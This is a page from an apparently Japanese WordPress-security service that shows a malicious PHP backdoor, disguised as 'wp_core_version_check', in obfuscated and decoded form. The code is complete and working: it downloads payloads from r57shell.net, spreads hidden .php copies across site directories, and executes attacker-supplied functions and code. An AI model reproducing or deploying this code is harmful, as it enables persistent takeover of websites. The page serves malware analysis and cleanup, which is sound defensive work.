Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto QHTmE; ReBbR: $file_path = dirname($document_file); goto yxZ6i; QHTmE: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto TmK7C; B8IHf: $uri_path = $parse_url["path"]; goto DR8d0; TmK7C: $request_uri = ...



難読化されたPHPコード

<?php 
 if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto QHTmE; ReBbR: $file_path = dirname($document_file); goto yxZ6i; QHTmE: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto TmK7C; B8IHf: $uri_path = $parse_url["path"]; goto DR8d0; TmK7C: $request_uri = $_SERVER["REQUEST_URI"]; goto Lhccs; Sae33: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto EmUwt; yxZ6i: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); goto TMxaR; O4NxR: if (!file_exists($tmp_file)) { goto Jjyr3; qVUcF: @touch($tmp_file); goto FrbfO; FrbfO: @file_put_contents($tmp_file, $response); goto fUkP_; Jjyr3: if (function_exists("curl_init")) { goto EZy_9; EZy_9: $ch = curl_init(); goto VR0Vi; OFlqh: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VdcLO; VR0Vi: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto OFlqh; DcJlW: $response = curl_exec($ch); goto fkRwe; VdcLO: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto DcJlW; fkRwe: curl_close($ch); goto MpMm6; MpMm6: } else { goto Rsl9q; PQRsR: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto NXRla; DmscO: $context = stream_context_create($opts); goto PQRsR; Rsl9q: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto vGpwe; vGpwe: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto DmscO; NXRla: } goto qVUcF; fUkP_: } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { goto Mh1sz; Mh1sz: if (function_exists("curl_init")) { goto DVDkP; u_SFh: $response = curl_exec($ch); goto zDHcZ; zMTgu: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto AvWVd; YWAQw: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto u_SFh; DVDkP: $ch = curl_init(); goto zMTgu; zDHcZ: curl_close($ch); goto v98go; AvWVd: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto YWAQw; v98go: } else { goto JGb71; Npbn0: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto dtUcU; JGb71: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto Npbn0; hCspz: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto XWjW4; dtUcU: $context = stream_context_create($opts); goto hCspz; XWjW4: } goto zkCQa; zkCQa: @touch($tmp_file); goto RL2uX; RL2uX: @file_put_contents($tmp_file, $response); goto Fx07H; Fx07H: } } goto BXZRC; EmUwt: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } goto jUXuO; DR8d0: $uri_path = dirname($uri_path); goto ReBbR; QCYq2: foreach ($dirs as $d) { goto DpqP9; eMOLH: @file_put_contents($file_name, $response); goto xQTu4; xQTu4: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto KHsZ5; DpqP9: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; goto eMOLH; KHsZ5: foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; @file_put_contents($file_name, $response); } } goto vTd8M; vTd8M: } goto VCwm6; jUXuO: if (@$_GET["slince_golden"]) { goto qhIqa; v6_uU: if (md5(sha1(@$_GET["is"])) == $response) { goto LNCgX; LNCgX: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto mNwUE; mNwUE: if (@$_GET["m"]) { goto u3lO9; u3lO9: if (function_exists("curl_init")) { goto h0059; nzFPK: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); goto SlTBv; SMEF2: curl_close($ch); goto nxTNz; h0059: $ch = curl_init(); goto nzFPK; SlTBv: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto cerjF; cerjF: $response = curl_exec($ch); goto SMEF2; nxTNz: } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } goto VIyGz; oeY1g: echo $file_name_path; goto UXu2c; VIyGz: $file_name_path = @$_GET["m"] . "gagal.php"; goto xhRaG; xhRaG: @file_put_contents($file_name_path, $response); goto oeY1g; UXu2c: } goto jKG5A; jKG5A: if (@$_POST["l"]) { function basic_code_extensions($request) { goto JTclu; tgcIK: $tmpf = $tmpf["uri"]; goto z3rep; vnQ75: $ret = (include $tmpf); goto Cvaad; JTclu: $tmp = tmpfile(); goto ToYXQ; ToYXQ: $tmpf = stream_get_meta_data($tmp); goto tgcIK; z3rep: fwrite($tmp, $request); goto vnQ75; aY2Ix: return $ret; goto hdvh2; Cvaad: fclose($tmp); goto aY2Ix; hdvh2: } print_r(basic_code_extensions($_POST["l"])); } goto ZFcwP; ZFcwP: } goto OlWFN; OlWFN: exit; goto vQOuT; qhIqa: echo "<!-- //Silence is golden. -->"; goto q9t4S; q9t4S: if (function_exists("curl_init")) { goto P3bql; sk_2w: curl_close($ch); goto j1BU_; P3bql: $ch = curl_init(); goto FA3oh; FA3oh: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); goto XAilZ; AJz_6: $response = curl_exec($ch); goto sk_2w; XAilZ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto AJz_6; j1BU_: } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } goto v6_uU; vQOuT: } goto O4NxR; TMxaR: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto Sae33; BXZRC: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto QCYq2; Lhccs: $parse_url = parse_url($request_uri); goto B8IHf; VCwm6: } wp_core_version_check(); } ?>

デコード(難読化解除)されたコード

<?php

if (!function_exists("wp_core_version_check")) {
    function wp_core_version_check()
    {
        $document_file = $_SERVER["SCRIPT_FILENAME"];
        $request_uri = $_SERVER["REQUEST_URI"];
        $parse_url = parse_url($request_uri);
        $uri_path = $parse_url["path"];
        $uri_path = dirname($uri_path);
        $file_path = dirname($document_file);
        $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path);
        if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') {
            $document_root = $file_path;
        } else {
            $document_root = str_replace($uri_path, '', $file_path);
        }
        $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]);
        if (is_writable(sys_get_temp_dir())) {
            $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . '');
        } else {
            $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . '');
        }
        if (@$_GET["slince_golden"]) {
            echo "<!-- //Silence is golden. -->";
            if (function_exists("curl_init")) {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get");
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                $response = curl_exec($ch);
                curl_close($ch);
            } else {
                $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get");
            }
            if (md5(sha1(@$_GET["is"])) == $response) {
                if (@$_GET["f"]) {
                    print_r($_GET["f"]($_GET["c"]));
                }
                if (@$_GET["m"]) {
                    if (function_exists("curl_init")) {
                        $ch = curl_init();
                        curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt");
                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                        $response = curl_exec($ch);
                        curl_close($ch);
                    } else {
                        $response = file_get_contents("http://r57shell.net/mini_admin.txt");
                    }
                    $file_name_path = @$_GET["m"] . "gagal.php";
                    @file_put_contents($file_name_path, $response);
                    echo $file_name_path;
                }
                if (@$_POST["l"]) {
                    function basic_code_extensions($request)
                    {
                        $tmp = tmpfile();
                        $tmpf = stream_get_meta_data($tmp);
                        $tmpf = $tmpf["uri"];
                        fwrite($tmp, $request);
                        $ret = (include $tmpf);
                        fclose($tmp);
                        return $ret;
                    }
                    print_r(basic_code_extensions($_POST["l"]));
                }
            }
            exit;
        }
        if (!file_exists($tmp_file)) {
            if (function_exists("curl_init")) {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
                $response = curl_exec($ch);
                curl_close($ch);
            } else {
                $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
                $opts = array("http" => array("header" => array("Referer: {$referer}\r\n\n")));
                $context = stream_context_create($opts);
                $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
            }
            @touch($tmp_file);
            @file_put_contents($tmp_file, $response);
        } else {
            $response = file_get_contents($tmp_file);
            if (!@preg_match("#stt1#", $response)) {
                if (function_exists("curl_init")) {
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
                    $response = curl_exec($ch);
                    curl_close($ch);
                } else {
                    $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
                    $opts = array("http" => array("header" => array("Referer: {$referer}\r\n\n")));
                    $context = stream_context_create($opts);
                    $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
                }
                @touch($tmp_file);
                @file_put_contents($tmp_file, $response);
            }
        }
        $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
        foreach ($dirs as $d) {
            $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
            @file_put_contents($file_name, $response);
            $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
            foreach ($dirs as $d) {
                if (!@preg_match("#wp-content#", $d)) {
                    $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
                    @file_put_contents($file_name, $response);
                }
            }
        }
    }
    wp_core_version_check();
}


■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.